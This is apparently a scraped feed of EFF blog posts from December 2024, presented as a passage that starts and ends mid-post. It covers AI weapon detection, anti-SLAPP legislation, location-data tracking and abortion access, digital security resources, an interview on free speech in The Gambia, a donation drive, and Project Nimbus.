sell \u201cweapon detection technology\u201d which they claimed would use AI to scan people entering a stadium, school, or museum and theoretically alert authorities if it recognizes the shape of a weapon on a person.\u00a0\n\nEven before the new FTC action, there was indication that this technology was not an effective solution to weapon-based violence. From July to October, New York City rolled out a trial of Evolv technology in 20 subway systems in an attempt to keep people from bringing weapons on to the transit system. Out of 2,749 scans there were 118 false positives. Twelve knives and no guns were recovered.\u00a0\n\nMake no mistake, false positives are dangerous. Falsely telling officers to expect an armed individual is a recipe for an unarmed person to be injured or even killed.\u00a0\n\nCities, performance venues, schools, and transit systems are understandably eager to do something about violence\u2013but throwing money at the problem by buying unproven technology is not the answer and actually takes away resources and funding from more proven and systematic approaches. We applaud the FTC for standing up to the lucrative security theater technology industry.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>This Bill Could Put A Stop To Censorship By Lawsuit<\/a><\/span>
by Joe Mullin<\/a> on December 5, 2024 at 6:38 pm <\/small>
For years now, deep-pocketed individuals and corporations have been turning to civil lawsuits to silence their opponents. These Strategic Lawsuits Against Public Participation, or SLAPPs, aren\u2019t designed to win on the merits, but rather to harass journalists, activists, and consumers into silence by suing them over their protected speech. While 34 states have laws to protect against these abuses, there is still no protection at a federal level.\u00a0\nToday, Reps. Jamie Raskin (D-MD) and Kevin Kiley (R-CA) introduced the bipartisan Free Speech Protection Act. This bill is the best chance we\u2019ve seen in many years to secure strong federal protection for journalists, activists, and everyday people who have been subject to harassing meritless lawsuits.\u00a0\ntake action\nTell Congress We Don't want a weaponized court system\nThe Free Speech Protection Act is a long overdue tool to protect against the use of SLAPP lawsuits as legal weapons that benefit the wealthy and powerful. This bill will help everyday Americans of all political stripes who speak out on local and national issues.\u00a0\nIndividuals or companies who are publicly criticized (or even simply discussed) will sometimes use SLAPP suits to intimidate their critics. Plaintiffs who file these suits don\u2019t need to win on the merits, and sometimes they don\u2019t even intend to see the case through. But the stress of the lawsuit and the costly legal defense alone can silence or chill the free speech of defendants.\u00a0\nState anti-SLAPP laws work. But since state laws are often not applicable in federal court, people and companies can still maneuver to manipulate the court system, filing cases in federal court or in states with weak or nonexistent anti-SLAPP laws.\u00a0\nSLAPPs All Around\u00a0\nSLAPP lawsuits in federal court are increasingly being used to target activists and online critics. Here are a few recent examples:\u00a0\nCoal Ash Company Sued Environmental Activists\nIn 2016, activists in Uniontown, Alabama\u2014a poor, predominantly Black town with a median per capita income of around $8,000\u2014were sued for $30 million by a Georgia-based company that put hazardous coal ash into Uniontown\u2019s residential landfill. The activists were sued over statements on their website and Facebook page, which said things like the landfill \u201caffected our everyday life,\u201d and, \u201cYou can\u2019t walk outside, and you cannot breathe.\u201d The plaintiff settled the case after the ACLU stepped in to defend the activist group.\u00a0\nShiva Ayyadurai Sued A Tech Blog That Reported On Him\nIn 2016, technology blog Techdirt published articles disputing Shiva Ayyadurai\u2019s claim to have \u201cinvented email.\u201d Techdirt founder Mike Masnick was hit with a $15 million libel lawsuit in federal court. Masnick, an EFF Award\u00a0winner,\u00a0\u00a0fought back in court and his reporting remains online, but the legal fees had a big effect on his business. With a strong federal anti-SLAPP law, more writers and publishers will be able to fight back against bullying lawsuits without resorting to crowd-funding.\u00a0\nLogging Company Sued Greenpeace\u00a0\nIn 2016, environmental non-profit Greenpeace was sued along with several individual activists by Resolute Forest Products. Resolute sued over blog post statements such as Greenpeace\u2019s allegation that Resolute\u2019s logging was \u201cbad news for the climate.\u201d (After four years of litigation, Resolute was ordered to pay nearly $1 million in fees to Greenpeace\u2014because a judge found that California\u2019s strong anti-SLAPP law should apply.)\u00a0\nCongressman Sued His Twitter Critics And Media Outlets\u00a0\nIn 2019, anonymous Twitter accounts were sued by Rep. Devin Nunes, then a congressman representing parts of Central California. Nunes used lawsuits to attempt to unmask and punish two Twitter users who used the handles @DevinNunesMom and @DevinCow to criticize his actions as a politician. Nunes filed these actions in a state court in Henrico County, Virginia. The location had little connection to the case, but Virginia\u2019s weak anti-SLAPP law has enticed many plaintiffs there.\u00a0\nOver the next few years, Nunes went on to sue many other journalists who published critical articles about him, using state and federal courts to sue CNN, The Washington Post, his hometown paper The Fresno Bee, MSNBC, a group of his own constituents, and others. Nearly all of these lawsuits were dropped or dismissed by courts. If a federal anti-SLAPP law were in place, more defendants would have a chance of dismissing such lawsuits early and recouping their legal fees.\u00a0\nFast Relief From SLAPPs\nThe Free Speech Protection Act gives defendants of SLAPP suits a powerful tool to defend themselves.\nThe bill would allow a defendant sued for speaking out on a matter of public concern to file a special motion to dismiss, which the court must generally decide on within 90 days. If the court grants the speaker-defendant\u2019s motion, the claims are dismissed. In many situations, defendants who prevail on an anti-SLAPP motion will be entitled to have the plaintiff reimburse them for their legal fees.\u00a0\ntake action\nTell Congress\u00a0to pass the free speech protection act\nEFF has been defending the rights of online speakers for more than 30 years. A strong federal anti-SLAPP law will bring us closer to the vision of an internet that allows anyone to speak out and organize for change, especially when they speak against those with more power and resources. Anti-SLAPP laws enhance the rights of all. We urge Congress to pass The Free Speech Protection Act.\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Let's Answer the Question: \"Why is Printer Ink So Expensive?\"<\/a><\/span>
by Christian Romero<\/a> on December 5, 2024 at 5:01 pm <\/small>
Did you know that most printer ink isn\u2019t even expensive to make? Why then is it so expensive to refill the ink on your printer?\u00a0\nThe answer is actually pretty simple: monopolies, weird laws, and companies exploiting their users for profit. If this sounds mildly infuriating and makes you want to learn ways to fight back, then head over to our new site, Digital Rights Bytes! We\u2019ve even created a short video to explain what the heck is going on here.\u00a0\u00a0\nWe\u2019re answering the common tech questions that may be bugging you. Whether you\u2019re hoping to learn something new or want to share resources with your family and friends, Digital Rights Bytes can be your one-stop-shop to learn more about the technology you use every day.\u00a0\u00a0\nDigital Rights Bytes also has answers to other common questions about device repair, ownership of your digital media, and more. If you\u2019ve got additional questions you\u2019d like us to tackle in the future, let us know on your favorite social platform\u00a0using the\u00a0hashtag #DigitalRightsBytes!\u00a0<\/p><\/div><\/li>
<\/span><\/a><\/div>Location Tracking Tools Endanger Abortion Access. Lawmakers Must Act Now.<\/a><\/span>
by Lisa Femia<\/a> on December 4, 2024 at 10:06 pm <\/small>
EFF wrote recently about Locate X, a deeply troubling location tracking tool that allows users to see the precise whereabouts of individuals based on the locations of their smartphone devices. Developed and sold by the data surveillance company Babel Street, Locate X collects smartphone location data from a variety of sources and collates that data into an easy-to-use tool to track devices. The tool features a navigable map with red dots, each representing an individual device. Users can then follow the location of specific devices as they move about the map.\nLocate X\u2013and other similar services\u2013are able to do this by taking advantage of our largely unregulated location data market.\nUnfettered location tracking puts us all at risk. Law enforcement agencies can purchase their way around warrant requirements and bad actors can pay for services that make it easier to engage in stalking and harassment. Location tracking tools particularly threaten groups especially vulnerable to targeting, such as immigrants, the LGBTQ+ community, and even U.S. intelligence personnel abroad. Crucially, in a post-Dobbs United States, location surveillance also poses a serious danger to abortion-seekers across the country.\nEFF has warned before about how the location data market threatens reproductive rights. The recent reports on Locate X illustrate even more starkly how the collection and sale of location data endangers patients in states with abortion bans and restrictions.\nIn late October, 404 Media reported that privacy advocates from Atlas Privacy, a data removal company, were able to get their hands on Locate X and use it to track an individual device\u2019s location data as it traveled across state lines to visit an abortion clinic. Although the tool was designed for law enforcement, the advocates gained access by simply asserting that they planned to work with law enforcement in the future. They were then able to use the tool to track an individual device as it traveled from an apparent residence in Alabama, where there is a complete abortion ban, to a reproductive health clinic in Florida, where abortion is banned after 6 weeks of pregnancy.\u00a0\nFollowing this report, we published a guide to help people shield themselves from tracking tools like Locate X. While we urge everyone to take appropriate technical precautions for their situation, it\u2019s far past time to address the issue at its source. The onus shouldn\u2019t be on individuals to protect themselves from such invasive surveillance. Tools like Locate X only exist because U.S. lawmakers have failed to enact legislation that would protect our location data from being bought and sold to the highest bidder.\u00a0\nThankfully, there\u2019s still time to reshape the system, and there are a number of laws legislators could pass today to help protect us from mass location surveillance. Remember: when our location information is for sale, so is our safety.\u00a0\n\nBlame Data Brokers and the Online Advertising Industry\nThere are a vast array of apps available for your smartphone that request access to your location. Sharing this information, however, may allow your location data to be harvested and sold to shadowy companies known as data brokers. Apps request access to device location to provide various features, but once access has been granted, apps can mishandle that information and are free to share and sell your whereabouts to third parties, including data brokers. These companies collect data showing the precise movements of hundreds of millions of people without their knowledge or meaningful consent. They then make this data available to anyone willing to pay, whether that\u2019s a private company like Babel Street (and anyone they in turn sell to) or government agencies, such as law enforcement, the military, or ICE. \nThis puts everyone at risk. Our location data reveals far more than most people realize, including where we live and work, who we spend time with, where we worship, whether we\u2019ve attended protests or political gatherings, and when and where we seek medical care\u2014including reproductive healthcare.\nWithout massive troves of commercially available location data, invasive tools like Locate X would not exist.\nFor years, EFF has warned about the risk of law enforcement or bad actors using commercially available location data to track and punish abortion seekers. Multiple data brokers have specifically targeted and sold location information tied to reproductive healthcare clinics. The data broker SafeGraph, for example, classified Planned Parenthood as a \u201cbrand\u201d that could be tracked, allowing investigators at Motherboard to purchase data for over 600 Planned Parenthood facilities across the U.S. \nMeanwhile, the data broker Near sold the location data of abortion-seekers to anti-abortion groups, enabling them to send targeted anti-abortion ads to people who visited clinics. And location data firm Placer.ai even once offered heat maps showing where visitors to Planned Parenthood clinics approximately lived. Sale to private actors is disturbing given that several states have introduced and passed abortion \u201cbounty hunter\u201d laws, which allow private citizens to enforce abortion restrictions by suing abortion-seekers for cash.\nGovernment officials in abortion-restrictive states are also targeting location information (and other personal data) about people who visit abortion clinics. In Idaho, for example, law enforcement used cell phone data to charge a mother and son with kidnapping for aiding an abortion-seeker who traveled across state lines to receive care. While police can obtain this data by gathering evidence and requesting a warrant based on probable cause, the data broker industry allows them to bypass legal requirements and buy this information en masse, regardless of whether there\u2019s evidence of a crime.\n\nLawmakers Can Fix This \nSo far, Congress and many states have failed to enact legislation that would meaningfully rein in the data broker industry and protect our location information. Locate X is simply the end result of such an unregulated data ecosystem. But it doesn\u2019t have to be this way. There are a number of laws that Congress and state legislators could pass right now that would help protect us from location tracking tools.\n\n1. Limit What Corporations Can Do With Our Data\nA key place to start? Stronger consumer privacy protections. EFF has consistently pushed for legislation that would limit the ability of companies to harvest and monetize our data. If we enforce strict rules on how location data is collected, shared, and sold, we can stop it from ending up in the hands of private surveillance companies and law enforcement without our consent.\nWe urge legislators to consider comprehensive, across-the-board data privacy laws. Companies should be required to minimize the collection and processing of location data to only what is strictly necessary to offer the service the user requested (see, for example, the recently-passed Maryland Online Data Privacy Act). Companies should also be prohibited from processing a person\u2019s data, except with their informed, voluntary, specific, opt-in consent. \nWe also support reproductive health-specific data privacy laws, like Rep. Sara Jacobs\u2019 proposed \u201cMy Body My Data\u201d Act. Laws like this would create important protections for a variety of reproductive health data, even beyond location data. Abortion-specific data privacy laws can provide some protection against the specific problem posed by Locate X. But to fully protect against location tracking tools, we must legally limit processing of all location data and not just data at sensitive locations, such as reproductive healthcare clinics. \nWhile a limited law might provide some help, it would not offer foolproof protection. Imagine this scenario: someone travels from Alabama to New York for abortion care. With a data privacy law that protects only sensitive, reproductive health locations, Alabama police could still track that person\u2019s device on the journey to New York. Upon reaching the clinic in New York, their device would disappear into a sensitive location blackout bubble for a couple of hours, then reappear outside of the bubble where police could resume tracking as the person heads home. In this situation, it would be easy to infer where the person was during those missing two hours, giving Alabama police the lead they need.\nThe best solution is to minimize all location data, no exceptions. \n\n2. Limit How Law Enforcement Can Get Our Data\nCongress and state legislatures should also pass laws limiting law enforcement\u2019s ability to access our location data without proper legal safeguards.\nMuch of our mobile data, like our location data, is information law enforcement would typically need a court order to access. But thanks to the data broker industry, law enforcement can skip the courts entirely and simply head to the commercial market. The U.S. government has turned this loophole into a way to gather personal data on individuals without a search warrant.\u00a0\nLawmakers must close this loophole\u2014especially if they\u2019re serious about protecting abortion-seekers from hostile law enforcement in abortion-restrictive states. A key way to do this is for Congress to pass the Fourth Amendment is Not For Sale Act, which was originally introduced by Senator Ron Wyden in 2021 and made the important and historic step of passing the U.S. House of Representatives earlier this year.\u00a0\nAnother crucial step is to ban law enforcement from sending \u201cgeofence warrants\u201d to corporate holders of location data. Unlike traditional warrants, a geofence warrant doesn\u2019t start with a particular suspect or even a device or account; instead police request data on every device in a given geographic area during a designated time period, regardless of whether the device owner has any connection to the crime under investigation.This could include, of course, an abortion clinic.\u00a0\nNotably, geofence warrants are very popular with law enforcement. Between 2018 and 2020, Google alone received more than 5,700 demands of this type from states that now have anti-abortion and anti-LGBTQ legislation on the books.\nSeveral federal and state courts have already found individual geofence warrants to be unconstitutional and some have even ruled they are \u201ccategorically prohibited by the Fourth Amendment.\u201d But instead of waiting for remaining courts to catch up, lawmakers should take action now, pass legislation banning geofence warrants, and protect all of us\u2013abortion-seekers included\u2013from this form of dragnet surveillance.\n\n3. Make Your State a Data Sanctuary\nIn the wake of the Dobbs decision, many states stepped up to serve as health care sanctuaries for people seeking abortion care that they could not access in their home states. To truly be a safe refuge, these states must also be data sanctuaries. A state that has data about people who sought abortion care must protect that data, and not disclose it to adversaries who would use it to punish them for seeking that healthcare. California has already passed laws to this effect, and more states should follow suit. \n\nWhat You Can Do Right Now\nEven before lawmakers act, there are steps you can take to better shield your location data from tools like Locate X.\u00a0 As noted above, we published a Locate X-specific guide several weeks ago. There are also additional tips on EFF\u2019s Surveillance Self-Defense site, as well as many other resources available to provide more guidance in protecting your digital privacy. Many general privacy practices also offer strong protection against location tracking.\u00a0\nBut don\u2019t stop there: we urge you to make your voice heard and contact your representatives. While these precautions offer immediate protection, only stronger laws will ensure comprehensive location privacy in the long run.<\/p><\/div><\/li>
<\/span><\/a><\/div>Top Ten EFF Digital Security Resources for People Concerned About the Incoming Trump Administration<\/a><\/span>
by Cooper Quintin<\/a> on December 3, 2024 at 11:27 pm <\/small>
In the wake of the 2024 election in the United States, many people are concerned about tightening up their digital privacy and security practices. As always, we recommend that people start making their security plan by understanding their risks. For most people in the U.S., the threats that they face and the methods by which they are likely to be surveilled or harassed have not changed, but the consequences of digital privacy or security failures may become much more serious, especially for vulnerable populations such as journalists, activists, LGBTQ+ people, people seeking or providing abortion-related care, Black or Indigenous people, and undocumented immigrants.\n\nEFF has decades of experience in providing digital privacy and security resources, particularly for vulnerable people. We\u2019ve written a lot of resources over the years and here are the top ten that we think are most useful right now:\n\n1. Surveillance Self-Defense\n\nhttps:\/\/ssd.eff.org\/\nOur Surveillance Self-Defense guides are a great place to start your journey of securing yourself against digital threats. We know that it can be a bit overwhelming, so we recommend starting with our guide on making a security plan so you can familiarize yourself with the basics and decide on your specific needs. Or, if you\u2019re planning to head out to a protest soon and want to know the most important ways to protect yourself, check out our guide to Attending a Protest. Many people in the groups most likely to be targeted in the upcoming months will need advice tailored to their specific threat models, and for that we recommend the Security Scenarios module as a quick way to find the right information for your particular situation.\u00a0\n\n2. Street-Level Surveillance\n\nhttps:\/\/sls.eff.org\/\u00a0\nIf you are creating your security plan for the first time, it\u2019s helpful to know which technologies might realistically be used to spy on you. If you\u2019re going to be out on the streets protesting or even just existing in public, it\u2019s important to identify which threats to take seriously. Our Street-Level Surveillance team has spent years studying the technologies that law enforcement uses and has made this handy website where you can find information about technologies including drones, face recognition, license plate readers, stingrays, and more.\n\n3. Atlas Of Surveillance\n\nhttps:\/\/atlasofsurveillance.org\/\u00a0\nOnce you have learned about the different types of surveillance technologies police can acquire from our Street-Level surveillance guides, you might want to know which technologies your local police has already bought. You can find that in our Atlas of Surveillance, a crowd-sourced map of police surveillance technologies in the United States.\u00a0\n4. Doxxing: Tips To Protect Yourself Online & How to Minimize Harm\n\nhttps:\/\/www.eff.org\/deeplinks\/2020\/12\/doxxing-tips-protect-yourself-online-how-minimize-harm\nSurveillance by governments and law enforcement is far from the only kind of threat that people face online. We expect to see an increase in doxxing and harassment of vulnerable populations by vigilantes, emboldened by the incoming administration\u2019s threatened policies. This guide is our thinking around the precautions you may want to take if\u00a0 you are likely to be doxxed and how to minimize the harm if you\u2019ve been doxxed already.\n\n5. Using Your Phone in Times of Crisis\n\nhttps:\/\/www.eff.org\/deeplinks\/2022\/03\/using-your-phone-times-crisis\nUsing your phone in general can be a cause for anxiety for many people. We have a short guide on what considerations you should make when you are using your phone in times of crisis. This guide is specifically written for people in war zones, but may also be useful more generally.\u00a0\n\n6. Surveillance-Self Defense for Campus Protests\n\nhttps:\/\/www.eff.org\/deeplinks\/2024\/06\/surveillance-defense-campus-protests\u00a0\nOne prediction we can safely make for 2025 is that campus protests will continue to be important. This blog post is our latest thinking about how to put together your security plan before you attend a protest on campus.\n\n7. Security Education Companion\n\nhttps:\/\/www.securityeducationcompanion.org\/\nFor those who are already comfortable with Surveillance Self-Defense, you may be getting questions from your family, friends, or community about what to do now. You may even consider giving a digital security training session to people in your community, and for that you will need guidance and training materials. The Security Education Companion has everything you need to get started putting together a training plan for your community, from recommended lesson plans and materials to guides on effective teaching.\n\n8. Police Location Tracking\n\nhttps:\/\/www.eff.org\/deeplinks\/2024\/11\/creators-police-location-tracking-tool-arent-vetting-buyers-heres-how-protect\u00a0\nOne police surveillance technology we are especially concerned about is location tracking services. These are data brokers that get your phone's location, usually through the same invasive ad networks that are baked into almost every app, and sell that information to law enforcement. This can include historical maps of where a specific device has been, or a list of all the phones that were at a specific location, such as a protest or abortion clinic. This blog post goes into more detail on the problem and provides a guide on how to protect yourself and keep your location private.\n\n9. Should You Really Delete Your Period Tracking App?\n\nhttps:\/\/www.eff.org\/deeplinks\/2022\/06\/should-you-really-delete-your-period-tracking-app\nAs soon as the Supreme Court overturned Roe v. Wade, one of the most popular bits of advice going around the internet was to \u201cdelete your period tracking app.\u201d Deleting your period tracking app may feel like an effective countermeasure in a world where seeking abortion care is increasingly risky and criminalized, but it\u2019s not advice that is grounded in the reality of the ways in which governments and law enforcement currently gather evidence against people who are prosecuted for their pregnancy outcomes. This blog post provides some more effective ways of protecting your privacy and sensitive information.\u00a0\n\n10. Why We Can\u2019t Just Tell You Which Messenger App to Use\n\nhttps:\/\/www.eff.org\/deeplinks\/2018\/03\/why-we-cant-give-you-recommendation\nPeople are always asking us to give them a recommendation for the best end-to-end encrypted messaging app. Unfortunately, this is asking for a simple answer to an extremely nuanced question. While the short answer is \u201cprobably Signal most of the time,\u201d the long answer goes into why that is not always the case. Since we wrote this in 2018, some companies have come and gone, but our thinking on this topic hasn\u2019t changed much.\n\nBonus external guide\nhttps:\/\/digitaldefensefund.org\/learn\nOur friends at the Digital Defense Fund have put together an excellent collection of guides aimed at particularly vulnerable people who are thinking about digital security for the first time. They have a comprehensive collection of links to other external guides as well.\n\n***\n\nEFF is committed to keeping our privacy and security advice accurate and up-to-date, reflecting the needs of a variety of vulnerable populations. We hope these resources will help you keep yourself and your community safe in dangerous times.<\/p><\/div><\/li>
<\/span><\/a><\/div>Speaking Freely: Aji Fama Jobe<\/a><\/span>
by David Greene<\/a> on December 3, 2024 at 7:26 pm <\/small>
This interview has been edited for length and clarity.\nAji Fama Jobe is a digital creator, IT consultant, blogger, and tech community leader from The Gambia. She helps run Women TechMakers Banjul, an organization that provides visibility, mentorship, and resources to women and girls in tech. She also serves as an Information Technology Assistant with the World Bank Group where she focuses on resolving IT issues and enhancing digital infrastructure. Aji Fama is a dedicated advocate working to leverage technology to enhance the lives and opportunities of women and girls in Gambia and across Africa.\nGreene: Why don\u2019t you start off by introducing yourself?\u00a0\nMy name is Aji Fama Jobe. I\u2019m from Gambia and I run an organization called Women TechMakers Banjul that provides resources to women and girls in Gambia, particularly in the Greater Banjul area. I also work with other organizations that focus on STEM and digital literacy and aim to impact more regions and more people in the world. Gambia is made up of six different regions and we have host organizations in each region. So we go to train young people, especially women, in those communities on digital literacy. And that\u2019s what I\u2019ve been doing for the past four or five years.\u00a0\nGreene: So this series focuses on freedom of expression. What does freedom of expression mean to you personally?\u00a0\nFor me it means being able to express myself without being judged. Because most of the time\u2014and especially on the internet because of a lot of cyber bullying\u2014I tend to think a lot before posting something. It\u2019s all about, what will other people think? Will there be backlash? And I just want to speak freely. So for me it means to speak freely without being judged.\u00a0\nGreene: Do you feel like free speech means different things for women in the Gambia than for men? And how do you see this play out in the work that you do?\u00a0\nIn the Gambia we have freedom of expression, the laws are there, but the culture is the opposite of the laws. Society still frowns on women who speak out, not just in the workspace but even in homes. Sometimes men say a woman shouldn\u2019t speak loud or there\u2019s a certain way women should express. It\u2019s the culture itself that makes women not speak up in certain situations. In our culture it\u2019s widely accepted that you let the man or the head of the family\u2014who\u2019s normally a man, of course\u2014speak. I feel like freedom of speech is really important when it comes to the work we do. Because women should be able to speak freely. And when you speak freely it gives you that confidence that you can do something. So it\u2019s a larger issue. What our organization does on free speech is address the unconscious bias in the tech space that impacts working women. I work as an IT consultant and sometimes when we\u2019re trying to do something technical people always assume IT specialists are men. So sometimes we just want to speak up and say, \u201cIt\u2019s IT woman, not IT guy.\u201d\u00a0\nGreene: We could say that maybe socially we need to figure this out, but now let me ask you this. Do you think the government has a role in regulating online speech?\u00a0\nThose in charge of policy enforcement don\u2019t understand how to navigate these online pieces. It\u2019s not just about putting the policies in place. They need to train people how to navigate this thing or how to update these policies in specific situations. It\u2019s not just about what the culture says. The policy is the policy and people should follow the rules, not just as civilians but also as policy enforcers and law enforcement. They need to follow the rules, too.\u00a0\nGreene: What about the big companies that run these platforms? What\u2019s their role in regulating online speech?\u00a0\nWith cyber-bullying I feel like the big companies need to play a bigger role in trying to bring down content sometimes. Take Facebook for example. They don\u2019t have many people that work in Africa and understand Africa with its complexities and its different languages. For instance, in the Gambia we have 2.4 million people but six or seven languages. On the internet people use local languages to do certain things. So it\u2019s hard to moderate on the platform\u2019s end, but also they need to do more work.\u00a0\nGreene: So six local languages in the Gambia? Do you feel there\u2019s any platform that has the capability to moderate that?\u00a0\nIn the Gambia? No. We have some civil society that tries to report content, but it\u2019s just civil society and most of them do it on a voluntary basis, so it\u2019s not that strong. The only thing you can do is report it to Facebook. But Facebook has bigger countries and bigger issues to deal with, and you end up waiting in a lineup of those issues and then the damage has already been done.\u00a0\nGreene: Okay, let\u2019s shift gears. Do you consider the current government of the Gambia to be democratic?\u00a0\nI think it is pretty democratic because you can speak freely after 2016 unlike with our last president. I was born in an era when people were not able to speak up. So I can only compare the last regime and the current one. I think now it\u2019s more democratic because people are able to speak out online. I can remember back before the elections of 2016 that if you said certain things online you had to move out of the country. Before 2016 people who were abroad would not come back to Gambia for fear of facing reprisal for content they had posted online. Since 2016 we have seen people we hadn\u2019t seen for like ten or fifteen years. They were finally able to come back.\u00a0\nGreene: So you lived in the country under a non-democratic regime with the prior administration. Do you have any personal stories you could tell about life before 2016 and feeling like you were censored? Or having to go outside of the country to write something?\u00a0\nTechnically it was a democracy but the fact was you couldn\u2019t speak freely. What you said could get you in trouble\u2014I don\u2019t consider that a democracy.\u00a0\nDuring the last regime I was in high school. One thing I realized was that there were certain political things teachers wouldn\u2019t discuss because they had to protect themselves. At some point I realized things changed because before 2016 we didn\u2019t say the president\u2019s name. We would give him nicknames, but the moment the guy left power we felt free to say his name directly. I experienced censorship from not being able to say his name or talk about him. I realized there was so much going on when the Truth, Reconciliation, and Reparations Commission (TRC) happened and people finally had the confidence to go on TV and speak about their stories.\u00a0\nAs a young person I learned that what you see is not everything that\u2019s happening. There were a lot of things that were happening but we couldn\u2019t see because the media was restricted. The media couldn\u2019t publish certain things. When he left and through the TRC we learned about what happened. A lot of people lost their lives. Some had to flee. Some people lost their mom or dad or some got raped. I think that opened my world. Even though I\u2019m not politically inclined or in the political space, what happened there impacted me. Because we had a political moment where the president didn\u2019t accept the elections, and a lot of people fled and went to Senegal. I stayed like three or four months and the whole country was on lockdown. So that was my experience of what happens when things don\u2019t go as planned when it comes to the electoral process. That was my personal experience.\u00a0\nGreene: Was there news media during that time? Was it all government-controlled or was there any independent news media?\u00a0\nWe had some independent news media, but those were from Gambians outside of the country. The media that was inside the country couldn\u2019t publish anything against the government. If you wanted to know what was really happening, you had to go online. At some point, WhatsApp was blocked so we had to move to Telegram and other social media. I also realized that at some point because my dad was in Iraq and I had to download a VPN so I could talk to him and tell him what was happening in the country because my mom and I were there. That\u2019s why when people censor the internet I\u2019m really keen on that aspect because I\u2019ve experienced that.\u00a0\nGreene: What made you start doing the work you\u2019re doing now?\u00a0\nFirst, when I started doing computer science\u2014I have a computer science background\u2014there was no one there to tell me what to do or how to do it. I had to navigate things for myself or look for people to guide me. I just thought, we don\u2019t have to repeat the same thing for other people. That\u2019s why we started Women TechMakers. We try to guide people and train them. We want employers to focus on skills instead of gender. So we get to train people, we have a lot of book plans and online resources that we share with people. If you want to go into a certain field we try to guide you and send you resources. That\u2019s one of the things we do. Just for people to feel confident in their skills. And everyday people say to me, \u201cBecause of this program I was able to get this thing I wanted,\u201d like a job or an event. And that keeps me going. Women get to feel confident in their skills and in the places they work, too. Companies are always looking for diversity and inclusion. Like, \u201coh I have two female developers.\u201d At the end of the day you can say you have two developers and they\u2019re very good developers. And yeah, they\u2019re women. It\u2019s not like they\u2019re hired because they\u2019re women, it\u2019s because they\u2019re skilled. That\u2019s why I do what I do.\u00a0\nGreene: Is there anything else you wanted to say about freedom of speech or about preserving online open spaces?\u00a0\nI work with a lot of technical people who think freedom of speech is not their issue. But what I keep saying to people is that you think it\u2019s not your issue until you experience it. But freedom of speech and digital rights are everybody\u2019s issues. Because at the end of the day if you don\u2019t have that freedom to speak freely online or if you are not protected online we are all vulnerable. It should be everybody\u2019s responsibility. It should be a collective thing, not just government making policies. But also people need to be aware of what they\u2019re posting online. The words you put out there can make or break someone, so it\u2019s everybody\u2019s business. That\u2019s how I see digital rights and freedom of expression. As a collective responsibility.\u00a0\nGreene: Okay, our last question that we ask everybody. Who is your free speech hero?\u00a0\nMy mom\u2019s elder sister. She passed away in 2015, but her name is Mariama Jaw and she was in the political space even during the time when people were not able to speak. She was my hero because I went to political rallies with her and she would say what people were not willing to say. Not just in political spaces, but in general conversation, too. She\u2019s somebody who would tell you the truth no matter what would happen, whether her life was in danger or not. I got so much inspiration from her because a lot of women don\u2019t go into politics or do certain things and they just want to get a husband, but she went against all odds and she was a politician, a mother and sister to a lot of people, to a lot of women in her community.<\/p><\/div><\/li>
<\/span><\/a><\/div>\ud83c\udf7f Today\u2019s Double Feature: Privacy and Free Speech<\/a><\/span>
by Aaron Jue<\/a> on December 3, 2024 at 8:33 am <\/small>
It\u2019s Power Up Your Donation Week! Right now, your contribution to the Electronic Frontier Foundation will go twice as far to protect digital privacy, security, and free speech rights for everyone. Will you donate today to get a free 2X match?\nPower Up!\nGive to EFF and get a free donation match\nThanks to a fund made by a group of dedicated supporters, your donation online gets an automatic match up to $307,200 through December 10! This means every dollar you give equals two dollars to fight surveillance, oppose censorship, defend encryption, promote open access to information, and much more. EFF makes every cent count.\nLights, Laptops, Action!\nWho has time to decode tech policy, understand the law, then figure out how to change things for the users? EFF does. The purpose of every attorney, activist, and technologist at EFF is to watch your back and make technology better. But you are the superstar who makes it possible with your support.\n'Fix Copyright' member shirt inspired by Steamboat Willie entering the public domain.\nWith the help of people like you, EFF has been able to help unravel legal and ethical questions surrounding the rise of AI; keep policymakers on the road to net neutrality; encourage the Fifth Circuit Court of Appeals to rule that location-based geofence warrants are unconstitutional; and explain why banning TikTok and passing laws like the Kids Online Safety Act (KOSA) will not achieve internet safety.\nThe world struggles to get tech right, but EFF\u2019s experts advocate for you every day of the year. Take action by renewing your EFF membership! You can set the stage for civil liberties and human rights online for everyone. Please give today and let your donation go twice as far for digital rights!\nPower Up!\nSupport internet freedom(and get an Instant match!)\nAlready an EFF Member?\nStrengthen the community when you help us spread the word about Power Up Your Donation Week! Here\u2019s some sample language that you can share:\n\nDonate to EFF this week for an instant match! Double your impact on digital privacy, security, and free speech rights for everyone. https:\/\/eff.org\/power-up\nBluesky | Email | Facebook | LinkedIn | X(More at eff.org\/social)\n\nEach of us has the power to help in the movement for internet freedom. Our future depends on forging a web where we can have private conversations and explore the world online with confidence, so I thank you for your moral support and hope to have you on EFF's side as a member, too.\n\nEFF is a member-supported U.S. 501(c)(3) organization. We\u2019re celebrating ELEVEN YEARS of top ratings from the nonprofit watchdog Charity Navigator! Your donation is tax-deductible as allowed by law.<\/p><\/div><\/li>
<\/span><\/a><\/div>Amazon and Google Must Keep Their Promises on Project Nimbus<\/a><\/span>
by Betty Gedlu<\/a> on December 2, 2024 at 7:52 pm <\/small>
When a company makes a promise, the public should be able to rely on it. Today, nearly every person in the U.S. is a customer of either Amazon or Google\u2014and many of us are customers of both technology giants. Both of these companies have made public promises that they will ensure their technologies are not being used to facilitate human rights violations. These promises are not just corporate platitudes; they\u2019re commitments to every customer and to society at large.\u00a0\u00a0\nIt\u2019s a reasonable thing to ask if these promises are being kept. And it\u2019s especially important since Amazon and Google have been increasingly implicated by reports that their technologies, specifically their joint cloud computing initiative called Project Nimbus, are being used to facilitate mass surveillance and human rights violations of Palestinians in the Occupied Territories of the West Bank, East Jerusalem, and Gaza. This was the basis of our public call in August 2024 for the companies to come clean about their involvement.\u00a0\u00a0\u00a0\nBut we didn\u2019t just make a public call. We sent letters directly to the Global Head of Public Policy at Amazon\u00a0and to Google\u2019s Global Head of Human Rights in late September. We detailed what these companies have promised and asked them to tell us by November 1, 2024 how they were complying. We hoped that they could clear up the confusion, or at least explain where we, or the reporting we were relying on, were wrong.\u00a0\u00a0\nBut instead, they failed to respond. This is unfortunate, since it leads us to question how serious they were in their promises. And it should lead you to question that too.\nProject Nimbus: Technology at the Expense of Human Rights\nProject Nimbus provides advanced cloud and AI capabilities to the Israeli government, tools that an increasing number of credible reports suggest are being used to target civilians under pervasive surveillance in the Occupied Palestinian Territories. This is more than a technical collaboration\u2014it\u2019s a human rights crisis in the making as evidenced by data-driven targeting programs like Project Lavender and Where\u2019s Daddy, which have reportedly led to detentions, killings, and the 